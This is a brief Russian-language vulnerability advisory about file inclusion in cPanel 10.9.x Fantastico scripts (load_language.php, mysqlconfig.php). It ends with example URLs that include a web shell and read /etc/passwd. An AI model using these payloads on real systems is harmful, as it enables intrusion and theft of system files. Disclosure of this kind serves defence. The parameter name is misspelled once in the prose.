Программа: cPanel 10.9.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «userlanguage» сценарием load_language.php и в параметре «antasticopath» сценарием mysqlconfig.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



Оставить мнение